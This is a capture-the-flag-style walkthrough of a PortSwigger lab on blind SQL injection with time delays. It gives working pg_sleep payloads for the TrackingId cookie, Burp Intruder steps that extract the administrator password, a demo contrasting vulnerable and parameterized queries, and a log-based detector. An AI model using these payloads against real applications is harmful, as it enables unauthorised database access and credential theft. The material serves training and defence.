1.11 Lab: Blind SQL injection with time delays and information retrieval | 2023
2023-12-7 01:38:32 Author: infosecwriteups.com

The tracking cookie in this application is vulnerable to SQL injection. The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error, but it is possible to trigger conditional time delays to infer information. The database contains a different table called users, with columns called username and password. Find out the password of the administrator user | Karthikeyan Nagaraj

Karthikeyan Nagaraj

InfoSec Write-ups

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.
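The root cause is that the cookie value is spliced into the query text, and the time-delay oracle exists only because of that. The following example is added here (it is not part of this writeup, the lab, or PortSwigger's code) to show the vulnerable construction next to the parameterized fix. It uses an in-memory SQLite database with a hypothetical tracking/users schema, registers a stand-in pg_sleep() that records the requested delay instead of sleeping so the oracle becomes observable, and uses executescript() to model a database driver that accepts stacked statements as the lab's PostgreSQL backend does. The payload strings are the writeup's own (steps 2 and 10), appended to a TrackingId of "x".

```python
import sqlite3
from typing import List, Tuple

# Constructed sample credential for the demo; not the lab's real password.
# It is 20 characters long and starts with 'a' so both writeup payloads have a
# visible outcome.
ADMIN_PASSWORD = "a0constructedpass123"

# The writeup's payloads (steps 2 and 10), appended to a TrackingId value of "x".
PAYLOAD_LENGTH_GT_10 = ("x';SELECT CASE WHEN(username='administrator' AND LENGTH(password)>10) "
                        "THEN pg_sleep(0) ELSE pg_sleep(3) END FROM users--")
PAYLOAD_FIRST_CHAR_IS_A = ("x';SELECT CASE WHEN(username='administrator' AND SUBSTR(password,1,1)='a') "
                           "THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users--")


def make_db(sleep_log: List[int]) -> sqlite3.Connection:
    """In-memory stand-in for the lab's database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE tracking (id TEXT PRIMARY KEY, hits INTEGER);"
        "CREATE TABLE users (username TEXT, password TEXT);"
        "INSERT INTO tracking VALUES ('abc123', 1);"
    )
    conn.execute("INSERT INTO users VALUES (?, ?)", ("administrator", ADMIN_PASSWORD))
    # SQLite has no pg_sleep(); register a stand-in that records the requested
    # delay instead of sleeping, so a test can observe the timing oracle.
    conn.create_function("pg_sleep", 1, lambda seconds: sleep_log.append(seconds))
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, tracking_id: str) -> None:
    """Vulnerable: the cookie is spliced into the SQL text.

    executescript() models a driver that accepts stacked statements, which is
    what lets the "';SELECT ..." payload run as a second query.
    """
    conn.executescript(f"SELECT hits FROM tracking WHERE id = '{tracking_id}'")


def lookup_fixed(conn: sqlite3.Connection, tracking_id: str) -> List[Tuple[int]]:
    """Fixed: the cookie is bound as a parameter, so it is only ever compared as
    a string value and no second statement can be introduced."""
    return conn.execute("SELECT hits FROM tracking WHERE id = ?", (tracking_id,)).fetchall()


def sleeps_requested(tracking_id: str, fixed: bool) -> List[int]:
    """Run one lookup and return the pg_sleep() delays the database was asked for."""
    log: List[int] = []
    conn = make_db(log)
    if fixed:
        lookup_fixed(conn, tracking_id)
    else:
        lookup_vulnerable(conn, tracking_id)
    conn.close()
    return log


if __name__ == "__main__":
    # Vulnerable path: which CASE branch runs, hence the delay, depends on the admin password.
    print("vulnerable, LENGTH>10    :", sleeps_requested(PAYLOAD_LENGTH_GT_10, fixed=False))     # [0]
    print("vulnerable, first char a :", sleeps_requested(PAYLOAD_FIRST_CHAR_IS_A, fixed=False))  # [3]
    # Fixed path: no delay is ever requested, whatever the cookie contains.
    print("fixed, LENGTH>10         :", sleeps_requested(PAYLOAD_LENGTH_GT_10, fixed=True))      # []
    print("fixed, first char a      :", sleeps_requested(PAYLOAD_FIRST_CHAR_IS_A, fixed=True))   # []
```

The property worth asserting after a fix is the one the last two lines show: the database is never asked to sleep regardless of input, rather than the absence of any particular payload string. Blocking `pg_sleep` in a WAF would leave the injection itself in place.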

Pre-Requisite

Find the type of database using the below SQL Injection cheat sheet

Solution

  1. Capture the request for the homepage and send it to Burp Repeater. We know that the vulnerability lies in the tracking cookie.
  2. Append the query below to the end of the TrackingId value, URL-encoded.
    ';SELECT CASE WHEN(username='administrator' AND LENGTH(password)>10) THEN pg_sleep(0) ELSE pg_sleep(3) END FROM users--
  3. To URL-encode the payload, select it in Burp Suite and press Ctrl+U, or use the encoded payload below.
    '%3bSELECT+CASE+WHEN(username%3d'administrator'+AND+LENGTH(password)>10)+THEN+pg_sleep(0)+ELSE+pg_sleep(3)+END+FROM+users--
  4. The query is a conditional (boolean) check on the length of the administrator's password in the users table, with the outcome signalled by a time delay: if the password is longer than 10 characters the response arrives immediately; otherwise it is delayed by 3 seconds.
  5. We have to find the length of the admin password by incrementing the length value from 5 to 30 (assuming the password is no more than 30 characters).
  6. This can be automated by sending the request to Intruder → adding 5 as the payload position → setting the payload type to Numbers → setting 10 as the From value, 30 as the To value and 1 as the Step value.
  7. To make the time delays measurable, go to the Resource Pool tab in Intruder → click Create new resource pool and give it any name → set Maximum concurrent requests to 1 → start the attack.
  8. After the attack completes, open the Columns menu and select Response received. Notice that starting from the 20th request the Response received column shows a delay of over 3000 milliseconds. (If you raise the sleep to 5 seconds, the delayed responses will show about 5000 ms.)
  9. So we know from step 7 that the password is 20 characters long. Next we have to find the characters of the password.
  10. Go to Repeater and use the query below as we did for the previous one (URL-encode it).
    ';SELECT CASE WHEN(username='administrator' AND SUBSTR(password,1,1)='a') THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users--
  11. URL-encoded payload:
    '%3bSELECT+CASE+WHEN(username%3d'administrator'+AND+SUBSTR(password,1,1)%3d'a')+THEN+pg_sleep(3)+ELSE+pg_sleep(0)+END+FROM+users--
  12. This query checks whether the first character of the administrator's password in the users table is 'a'. If so, the response is delayed by 3 seconds; otherwise it arrives immediately.
  13. We have to keep changing the letter from 'a' to 'z' and '0' to '9' to find the actual characters of the password, so we automate this with Intruder.
  14. Send the request to Intruder → in SUBSTR(password,1,1) mark the first 1 as payload position 1 and the 'a' as payload position 2 → choose the Cluster bomb attack type.
  15. Select Numbers as the payload type for payload 1 → set 1 as the From value, 20 as the To value and 1 as the Step value.
  16. Select Brute forcer as the payload type for payload 2 → set 1 as both the min length and the max length.
  17. To make the time delays measurable, go to the Resource Pool tab in Intruder → select the resource pool we created in Step 6 and click Start attack.
  18. After the attack completes, open the Columns menu, select Response received and click the Response received column header to sort, so the responses that took over 3000 milliseconds are grouped together.
  19. Order the matched characters by their Payload 1 (position) number to assemble the password.
  20. Use that password to log in to the administrator account to solve the lab.

Solution 2 — Portswigger

  1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
  2. Modify the TrackingId cookie, changing it to:
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    Verify that the application takes 10 seconds to respond.
  3. Now change it to:
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    Verify that the application responds immediately with no time delay. This demonstrates how you can test a single boolean condition and infer the result.
  4. Now change it to:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    Verify that the condition is true, confirming that there is a user called administrator.
  5. The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    This condition should be true, confirming that the password is greater than 1 character in length.
  6. Send a series of follow-up values to test different password lengths. Send:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    Then send:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    And so on. You can do this manually using Burp Repeater, since the length is likely to be short. When the condition stops being true (i.e. when the application responds immediately without a time delay), you have determined the length of the password, which is in fact 20 characters long.
  7. After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so you need to use Burp Intruder. Send the request you are working on to Burp Intruder, using the context menu.
  8. In the Positions tab of Burp Intruder, change the value of the cookie to:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    This uses the SUBSTRING() function to extract a single character from the password, and test it against a specific value. Our attack will cycle through each position and possible value, testing each one in turn.
  9. Place payload position markers around the a character in the cookie value. To do this, select just the a, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers):
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
  10. To test the character at each position, you’ll need to send suitable payloads in the payload position that you’ve defined. You can assume that the password contains only lower case alphanumeric characters. Go to the Payloads tab, check that “Simple list” is selected, and under “Payload settings” add the payloads in the range a-z and 0-9. You can select these easily using the “Add from list” drop-down.
  11. To be able to tell when the correct character was submitted, you’ll need to monitor the time taken for the application to respond to each request. For this process to be as reliable as possible, you need to configure the Intruder attack to issue requests in a single thread. To do this, go to the “Resource pool” tab and add the attack to a resource pool with the “Maximum concurrent requests” set to 1.
  12. Launch the attack by clicking the “Start attack” button or selecting “Start attack” from the Intruder menu.
  13. Burp Intruder monitors the time taken for the application’s response to be received, but by default it does not show this information. To see it, go to the “Columns” menu, and check the box for “Response received”.
  14. Review the attack results to find the value of the character at the first position. You should see a column in the results called “Response received”. This will generally contain a small number, representing the number of milliseconds the application took to respond. One of the rows should have a larger number in this column, in the region of 10,000 milliseconds. The payload showing for that row is the value of the character at the first position.
  15. Now, you simply need to re-run the attack for each of the other character positions in the password, to determine their value. To do this, go back to the main Burp window, and the Positions tab of Burp Intruder, and change the specified offset from 1 to 2. You should then see the following as the cookie value:
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
  16. Launch the modified attack, review the results, and note the character at the second offset.
  17. Continue this process testing offset 3, 4, and so on, until you have the whole password.
  18. In the browser, click “My account” to open the login page. Use the password to log in as the administrator user.
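From the defender's side, both procedures above leave a distinctive trace: one client sends a long run of requests whose cookie, once URL-decoded, contains a SQL time-delay function after a quote and a semicolon, and the response times split into a fast baseline and outliers of roughly the pg_sleep() argument (3,000 or 10,000 ms here). The following example is added here and is not part of this writeup or of PortSwigger's solution; it runs that detection over a few constructed access-log lines. The log format, client addresses, thresholds and the severity scheme are assumptions; the two encoded TrackingId values on the third and fourth lines are the lab payloads from Solution 2.

```python
import re
from collections import defaultdict
from statistics import median
from urllib.parse import unquote_plus

# Constructed access-log lines in a hypothetical format:
#   client timestamp method path status response_ms cookie=<raw Cookie header>
# Lines 3 and 4 carry the lab's own encoded TrackingId payloads; every other value is made up.
SAMPLE_LOG = """\
203.0.113.5 2023-12-07T01:38:32Z GET / 200 48 cookie=TrackingId=abc123
203.0.113.5 2023-12-07T01:38:33Z GET / 200 52 cookie=TrackingId=abc123
203.0.113.5 2023-12-07T01:38:35Z GET / 200 10047 cookie=TrackingId=x%27%3BSELECT+CASE+WHEN+(1%3D1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
203.0.113.5 2023-12-07T01:38:36Z GET / 200 51 cookie=TrackingId=x%27%3BSELECT+CASE+WHEN+(1%3D2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
198.51.100.7 2023-12-07T01:38:37Z GET /product?productId=1 200 61 cookie=TrackingId=q9z7
198.51.100.7 2023-12-07T01:38:38Z GET /product?productId=2 200 58 cookie=TrackingId=q9z7
198.51.100.7 2023-12-07T01:38:41Z GET /product?productId=3 200 2950 cookie=TrackingId=q9z7
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<ts>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d+) "
    r"(?P<ms>\d+) cookie=(?P<cookie>.*)$"
)
# Time-delay primitives used by this class of injection: pg_sleep is PostgreSQL's,
# the others are the MySQL and SQL Server equivalents.
DELAY_FUNC_RE = re.compile(r"\b(pg_sleep|sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I)
QUOTE_SEMICOLON_RE = re.compile(r"'\s*;")   # string literal closed, then a stacked statement
COMMENT_RE = re.compile(r"--\s*$|/\*")      # comment used to swallow the rest of the query


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded values are inspected as the database would see them."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def payload_indicators(cookie: str) -> list:
    """Static indicators found in a cookie value after decoding."""
    decoded = decode_fully(cookie)
    hits = []
    if DELAY_FUNC_RE.search(decoded):
        hits.append("time_delay_function")
    if QUOTE_SEMICOLON_RE.search(decoded):
        hits.append("quote_then_semicolon")
    if COMMENT_RE.search(decoded):
        hits.append("sql_comment")
    return hits


def parse_log(text: str) -> list:
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ms"] = int(e["ms"])
            entries.append(e)
    return entries


def analyze(text: str) -> list:
    """Combine static indicators with a per-client timing baseline.

    A request is a timing outlier when it took at least 1 s and at least 5x the
    client's median response time (thresholds are assumptions; tune per site).
    Severity: both signals -> high, indicators only -> medium, timing only -> low.
    """
    entries = parse_log(text)
    per_client = defaultdict(list)
    for e in entries:
        per_client[e["ip"]].append(e["ms"])
    baseline = {ip: median(times) for ip, times in per_client.items()}
    findings = []
    for e in entries:
        indicators = payload_indicators(e["cookie"])
        outlier = e["ms"] >= max(1000, 5 * baseline[e["ip"]])
        if not indicators and not outlier:
            continue
        severity = "high" if (indicators and outlier) else "medium" if indicators else "low"
        findings.append({"ip": e["ip"], "ts": e["ts"], "ms": e["ms"], "indicators": indicators,
                         "timing_outlier": outlier, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["ms"], f["indicators"])
```

Over the sample, the 10,047 ms request with the payload scores high, the 51 ms request with the same kind of payload (the false branch) still scores medium on indicators alone, and the slow product page with a clean cookie scores low; the last case is why timing should never be the only signal, and the decoded-cookie check is what catches the `(1=2)` probe that produces no delay at all.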

Source: https://infosecwriteups.com/1-11-lab-blind-sql-injection-with-time-delays-and-information-retrieval-2023-e8123405e87d?source=rss----7b722bfd1b8d--bug_bounty